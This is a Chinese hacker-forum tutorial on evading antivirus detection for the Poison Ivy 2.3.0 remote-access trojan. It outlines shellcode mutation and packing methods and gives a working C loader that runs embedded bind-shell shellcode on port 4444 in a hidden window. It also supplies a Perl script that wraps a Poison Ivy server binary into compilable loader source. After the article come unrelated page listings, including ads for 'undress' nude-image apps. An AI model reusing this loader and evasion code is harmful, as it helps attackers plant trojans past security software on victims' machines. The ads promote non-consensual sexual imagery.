Poison Ivy 2.3.0 免杀的几点思路
文章作者:mika[EST] 今天在国外的IRC里看到有几个老外在讨论PI2.3的免杀,由于PI2.3的对齐方式跟过去的不太一样导致使用加壳程序处理后不能正常运行,所以它的免杀成了大家关注的对象了。于是乎俺下载了一个试了试,加过壳后的确不能运行了。可是由于PI2.3
文章作者:mika[EST]
今天在国外的IRC里看到有几个老外在讨论PI2.3的免杀,由于PI2.3的对齐方式跟过去的不太一样导致使用加壳程序处理后不能正常运行,所以它的免杀成了大家关注的对象了。于是乎俺下载了一个试了试,加过壳后的确不能运行了。可是由于PI2.3新增的功能支持shellcode生成,那就好办多了啊!shellcode我懂啊,变形我也懂啊,那免杀还不容易了吗?
PI2.3支持生成二进制格式的数据,C格式的shellcode,delphi格式的shellcode,perl格式的和python格式的。由于俺比较熟悉C格式的,所以就拿它来讨论一下吧
搞过溢出的哥哥姐姐弟弟妹妹们都知道,shellcode变形是编写exploit非常重要的一个环节,因此把它应用到免杀上来,理论上是既可以过文件免杀又可以过内存免杀的(当然,单纯的xor变形是不过内存的,需要对shellcode添加garbage code(垃圾代码)进行混淆才行)。
关于变形的思路那可就多了,估计这一个帖子是说不清楚的。有兴趣的朋友可以去一些比较著名的病毒站点查找,我这里推荐一个吧:http://vx.netlux.org。这个站有很多现成的变形工具可以用,自己拿去研究了(在病毒里,这种变形属于polymorphic
engine的一种)。
我这里大体说说思路吧,如果你使用的是别人编写好的polymorphic engine进行变形,而且支持shellcode格式输出的话(就是上面说的c或者delphi等格式的输出),那么你在用PI 2.3.0生成服务端的时候选择binary生成方式即可。这样生成出的就是二进制代码,然后用你的poly engine变形即可(这样的工具有tapion 1.0c,在我上面说的那个站可以找到)。
或者直接手工变形(哇噻,这个好麻烦滴但是作为一种思路俺在这里也提出来),方法简单的说一下吧,先手工添加garbage code(就跟添花指令一个概念),然后再变形(比如xor了等等),这种方式的好处是即使再被杀那么修改起来方便些,缺点不用说了就是第一次太麻烦了(不推荐哦)
再就是分段变形,意思是说一段一段的变形,然后把每个段再重新组合起来(以不同的顺序,当然原来的执行顺行不能变,因此需要添加代码把这些段连接起来),每一段的形式类似这样的:
decrpytor(解码头)+encrpyted code(变形后的代码)+link code(连接其它段的代码)。这种方式是最最最最麻烦的,但是变形强度是最最最最高的
看到这里和我一样的菜鸟们有可能就郁闷了,这么麻烦还要不要人活了啊嘿嘿~~~俺其实是在这摆方法嘛,所以俺能想到的都要说说,刚才是说的麻烦的。现在说个简单的(应该是非常简单的,别说俺卖关子啊)。
其实,我们最简单的方法可以这样做,把生成的shellcode变成一个pe格式的文件,不就可以用加壳工具处理了吗?
比如你生成的是C的shellcode格式,那么你可以用下面这个代码生成出一个PE文件来:
CODE:
#include
#pragma comment(linker, "/MERGE:.rdata=.text /MERGE:.data=.text /div:.text,EWR")
#pragma comment(linker,"/subsystem:windows /ENTRY:MyEntry")
#pragma comment(linker,"/INCREMENTAL:NO")
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow);
unsigned char PIshellcode[] ="\xD9\xE1\xD9\x34\x24\x58\x58\x58"
"\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
"\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
"\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
"\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"
"\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
"\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
"\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
"\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
"\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
"\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
"\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
"\xA3\x6D\xC5\xC5\xFA\x90\x92\x83\xCE\x1B\x74\xF8\x82\xC4\xC1\x6D"
"\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
"\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
"\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
"\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
"\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
"\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
"\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
"\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
"\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
"\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
"\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
"\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)
{
__asm{
lea eax,PIshellcode
call eax
}
return 1;
}
void MyEntry(void)
{
ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));
}
上面的shellcode是绑定本地端口4444的,用你生成的PI的shellcode替换就可以了。编译成功后的程序你就可以用加壳工具来处理了(你所能想到的免杀方法应该都可以用上了)。
上面我考虑到了体积的问题,所以尽量减少了体积(当然肯定还能再减哦,但是俺能想到就这些了)
最初提到的shellcode变形,最后也要用上面的程序生成PE文件,只不过不用再用工具处理了
为了方便大家从bin格式的文件生成文本格式的shellcode,而且方便大家生成上面的C代码,我写了一个perl脚本用来帮助大家生成perl和c格式的shellcode,代码如下:
CODE:
#!/usr/bin/perl
#written by mika[EST]
use strict;
my $BinName=shift || die "Usage: $0
my $bindata;
open(BF, "
$bindata = join('',
close(BF);
print "+ Length: " . length($bindata) . " bytes\n";
print "+ Generating Perl shellcode file ".$BinName.".pl ...";
my $buffer = BufferPerl($bindata);
open(PF,">$BinName.pl");
print PF "my \$PlShellcode=".$buffer;
close(PF);
print "Done"."\n";
print "+ Generating C shellcode file ".$BinName.".cpp...";
$buffer = BufferC($bindata);
my $C_shellcode;
while() { $C_shellcode .= $_; }
$C_shellcode =~ s/::SHELLCODE::/$buffer/g;
open(CF, ">$BinName.cpp");
print CF $C_shellcode;
close (CF);
print " Done"."\n";
sub BufferPerl
{
my ($data, $width) = @_;
my ($res, $count);
if (! $data) { return }
if (! $width) { $width = 16 }
$res = '"';
$count = 0;
foreach my $char (split(//, $data))
{
if ($count == $width)
{
$res .= '".' . "\n" . '"';
$count = 0;
}
$res .= sprintf("\\x%.2x",
ord($char));
$count++;
}
if ($count) { $res .= '";' . "\n"; }
return $res;
}
sub BufferC
{
my ($data, $width) = @_;
my $res = BufferPerl($data, $width);
if (! $res) { return }
$res =~ s/\.//g;
return $res;
}
__DATA__
#include
#pragma comment(linker, "/MERGE:.rdata=.text /MERGE:.data=.text /div:.text,EWR")
#pragma comment(linker,"/subsystem:windows /ENTRY:MyEntry")
#pragma comment(linker,"/INCREMENTAL:NO")
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow);
char PIshellCode[] =
::SHELLCODE::
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)
{
__asm{
lea eax,PIshellcode
call eax
}
return 1;
}
void MyEntry(void)
{
ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));
}
这个程序使用很简单,比如你在生成PI 2.3.0的服务端的时候选择生成binary格式,比如叫test.bin。把test.bin复制到这个perl程序同一目录里,然后在cmd下输入:
perl bin2shellcode.pl test
就可以了(不要.bin后缀),这样程序会在同目录下生成两个文件,一个是.pl后缀的perl文件,里面就是perl格式的shellcode,另一个就是.cpp后缀的C++文件,里面不光有生成好的shellcode而且程序直接帮你生成好了一个c++程序,你直接拿到VC下编译即可,生成的cpp文件内容如下:
CODE:
#include
#pragma comment(linker, "/MERGE:.rdata=.text /MERGE:.data=.text /div:.text,EWR")
#pragma comment(linker,"/subsystem:windows /ENTRY:MyEntry")
#pragma comment(linker,"/INCREMENTAL:NO")
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow);
char PIshellCode[] =
"\x55\x8b\xec\x81\xc4\x3c\xf2\xff\xff\x60\x33\xc0\x8d\xbd\x90\xf2"
"\xff\xff\xb9\x5b\x0d\x00\x00\xf3\xaa\x33\xc0\x8d\xbd\x4c\xf2\xff"
"\xff\xb9\x44\x00\x00\x00\xf3\xaa\xc7\x85\xb9\xf3\xff\xff\xe6\x00"
//...........................省略shellcode若干
"\x04\x00\x74\x65\x73\x74\xf9\x0b\x04\x00\x74\x65\x6d\x70\x90\x01"
"\x0d\x00\x09\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x00\x84\x0d\x8c"
"\x01\x04\x00\x00\x00\x00\x00\xc1\x02\x04\x00\xff\xff\xff\xff\x45"
"\x01\x05\x00\x61\x64\x6d\x69\x6e\xfb\x03\x09\x00\x29\x21\x56\x6f"
"\x71\x41\x2e\x49\x34\x00\x00\x00\x00";
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)
{
__asm{
lea eax,PIshellcode
call eax
}
return 1;
}
void MyEntry(void)
{
ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1376
52
How can I make money by publishing articles on Toutiao today? How to earn more income by publishing articles on Toutiao today!
Mar 15, 2024 pm 04:13 PM
1. How can you make money by publishing articles on Toutiao today? How to earn more income by publishing articles on Toutiao today! 1. Activate basic rights and interests: original articles can earn profits by advertising, and videos must be original in horizontal screen mode to earn profits. 2. Activate the rights of 100 fans: if the number of fans reaches 100 fans or above, you can get profits from micro headlines, original Q&A creation and Q&A. 3. Insist on original works: Original works include articles, micro headlines, questions, etc., and are required to be more than 300 words. Please note that if illegally plagiarized works are published as original works, credit points will be deducted, and even any profits will be deducted. 4. Verticality: When writing articles in professional fields, you cannot write articles across fields at will. You will not get appropriate recommendations, you will not be able to achieve the professionalism and refinement of your work, and it will be difficult to attract fans and readers. 5. Activity: high activity,
How to add article in HTML5?
Sep 12, 2023 am 11:37 AM
In this article, we will learn how to add articles in HTML5. One of the new segmentation elements in HTML5 is the tag. Articles are represented in HTML using tags. More specifically, the content contained within the element is different from the rest of the site's content (even though they may be related). Let us consider the following example to understand how to add an article in HTML5 Example 1 In the following example, we are using inline styles in the article element. <!DOCTYPEhtml><html><body><articlestyle="width:300px;border:2pxsolidgray;padding:
Interpretation of Vitalik's new article: Why does Rollup, whose blob space is not used efficiently, fall into development difficulties?
Apr 01, 2024 pm 08:16 PM
How to understand @VitalikButerin’s new article’s thoughts on Ethereum’s expansion? Some people say that Vitalik’s order for Blob Inscription is outrageous. So how do blob packets work? Why is the blob space not being used efficiently after the upgrade in Cancun? DAS data availability sampling in preparation for sharding? In my opinion, the performance of Cancun is usable after the upgrade, and Vitalik is worried about the development of Rollup. Why? Next, let me talk about my understanding: As I have explained many times before, Blob is a temporary data package that is decoupled from EVM calldata and can be directly called by the consensus layer. The direct benefit is that EVM does not need to access the Blob when executing transactions. data, thus resulting in lower execution layer computations
Detailed method for sending articles and recordings at the same time via WeChat
Mar 26, 2024 am 09:16 AM
1. Open your phone, click on the WeChat software, and enter the WeChat home page settings. 2. Find [My] in the lower right corner of WeChat, open it, and enter the [My] page. 3. Click Collection and then open a new page.
What should I do if the content of Dreamweaver CMS articles disappears? Quick solution
Mar 29, 2024 am 11:36 AM
DedeCMS is a powerful open source content management system that is widely used in various website construction. However, sometimes article content may disappear during use, which causes trouble to website operators. This article will introduce to you the common reasons and quick solutions for the disappearance of article content in DreamWeaver CMS, and provide specific code examples, hoping to help you solve this problem. 1. Possible reasons for the disappearance of article content: database operation error: the table storing article content in the database may
Is the content of DreamWeaver CMS articles lost? Done in one move
Mar 29, 2024 am 09:06 AM
DedeCMS is a powerful open source website content management system that is deeply loved by the majority of website builders. However, during use, article content may sometimes be lost, which causes considerable trouble to website administrators. This article will introduce a method to solve the problem of missing article content in DreamWeaver CMS, and provide specific code examples, hoping to help website administrators who encounter this problem. Description of the problem: In the process of using Dreamweaver CMS, sometimes the content of articles is lost. possible
Is it profitable to publish articles on Toutiao Search Express Edition?
Feb 29, 2024 pm 04:16 PM
Toutiao Search Express software not only provides a wealth of article content for users to browse, but also provides a platform for users to express themselves and share knowledge. Many users would like to know whether publishing articles in Toutiao Search Express Edition can make money, so today the editor of this site will introduce in detail whether publishing articles in Toutiao Search Express Edition can make money and how to publish articles. I hope it can help everyone in need. Is there any profit from publishing articles on Toutiao Search Express? Answer: Yes. 1. First, we open the Toutiao search speed version software. On the homepage, we click the [plus icon] in the upper right corner; 2. Then we will come to the page for publishing articles, where we can upload videos, photos, links, and enter text. Wait, everything is set up
Memory optimization ideas and methods in Go language
Jun 01, 2023 am 10:10 AM
With the continuous development of computer technology, more and more software applications require a large amount of memory and CPU resources to support their complex operations and calculations. Especially in fields such as big data and artificial intelligence, programs need to occupy a large amount of memory when running. Therefore, how to optimize the memory usage of programs has become a focus of computer scientists. In the past few years, the Go language developed by Google has received widespread attention and application as a lightweight programming language. The Go language attaches great importance to memory and CPU optimization in language design. Therefore, this
